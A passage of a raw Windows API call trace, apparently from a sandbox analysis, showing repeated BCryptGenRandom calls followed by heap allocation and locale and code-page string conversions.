cbBuffer=0x2d, dwFlags=0x2 | out: pbBuffer=0x3a01899) returned 0x0 [0276.998] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.998] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.998] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.998] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.999] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.999] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.999] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.999] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.999] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.999] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.999] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.999] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0277.000] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0277.000] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0277.000] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0277.000] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0277.000] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0277.000] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0277.000] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0277.000] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0277.001] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0277.001] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0277.002] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0277.002] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0277.002] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0277.002] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0277.002] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0277.002] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0277.002] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0277.002] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0277.003] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0277.003] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0277.003] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0277.003] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0277.003] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0277.003] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0277.003] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0277.003] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0277.003] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0277.003] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0277.003] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0277.004] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0277.004] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0277.004] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0277.004] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0277.004] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0277.004] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0277.004] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0277.004] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0277.004] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0277.005] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0277.005] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0277.005] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0277.005] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0277.005] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0277.005] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0277.005] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0277.005] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0277.006] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0277.006] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0277.006] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0277.006] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0277.006] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0277.006] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0277.006] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0277.006] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a018c6, cbBuffer=0x2c, dwFlags=0x2 | out: pbBuffer=0x3a018c6) returned 0x0 [0277.006] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0277.006] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0277.007] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0277.007] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0277.007] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0277.130] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0277.130] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0277.130] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0277.131] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0277.131] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0277.131] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0277.131] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0277.131] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0277.131] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0277.132] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0277.132] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0277.132] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0277.132] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0277.133] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0277.133] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0277.133] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0277.133] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0277.133] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0277.133] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0277.134] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0277.134] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0277.134] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0277.134] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0277.134] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0277.135] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0277.135] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0277.135] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0277.135] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0277.135] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0277.136] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0277.136] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0277.136] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0277.136] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0277.136] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0277.136] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0277.136] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0277.136] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0277.137] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0277.137] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0277.137] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0277.137] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0277.137] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0277.137] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0277.137] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0277.138] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0277.138] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0277.138] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0277.138] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0277.138] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0277.138] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0277.138] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0277.138] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0277.138] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0277.139] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0277.139] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0277.139] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0277.139] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0277.140] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0277.140] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0277.140] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0277.140] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0277.140] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0277.140] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0277.140] GetProcessHeap () returned 0x440000 [0277.140] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473da0 [0277.140] lstrcpyA (in: lpString1=0x473da0, lpString2="R*]?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ啐徑翼") returned 256 [0077.771] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ啐徑翼", cchSrc=256, lpCharType=0x14f990 | out: lpCharType=0x14f990) returned 1 [0077.771] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0077.771] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f360, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0077.771] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0077.771] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="LCMapStringEx") returned 0x7ffc5bfb5350 [0077.771] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0077.771] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14f150, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌") returned 256 [0077.771] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌", cchWideChar=256, lpMultiByteStr=0x14f790, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", lpUsedDefaultChar=0x0) returned 256 [0077.772] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0077.772] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f360, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ 